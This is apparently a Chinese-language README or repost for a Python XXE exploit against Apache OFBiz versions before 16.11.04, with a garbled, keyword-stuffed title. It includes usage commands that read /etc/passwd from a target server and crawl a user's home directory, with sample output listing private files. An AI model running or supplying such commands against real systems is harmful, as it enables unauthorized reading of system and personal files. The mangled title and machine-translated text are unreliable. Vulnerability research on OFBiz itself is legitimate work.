在Java 8中无法查看Apache OFBiz 16.11.04版本及以下的源代码，存在XXE注入漏洞，可导致文件泄露

java8 看不到源码阿帕奇 OFBiz XXE Apache OFBiz < 16.11.04 的 XXE 注入（文件泄露）漏洞利用 信息 16.11.04 版本之前的 Apache OFBiz 包含两个不同的 XXE 注入漏洞。 每个漏洞的公开披露可以在下面找到： [1] [2] 此漏洞利用针对链接 1 中披露的漏洞。虽然此漏洞未分配 CVE（根本原因在于过时的库），但它比链接 2 中披露的漏洞 (CVE-2018-8033) 更容易利用，后者需要托管一个外部 DTD，易受攻击的服务器必须在每个请求中引用该 DTD。 用法 显示单个文件 $ python exploit.py -u https://localhost:8443 -f /etc/passwd 爬取目录 $ python exploit.py -u https://localhost:8443 -c /home/bob [*] DIR: /home/bob [*] DIR: /home/bob/docs [*] FILE: /home/bob/docs/proposal.docx [*] DIR: /home/bob/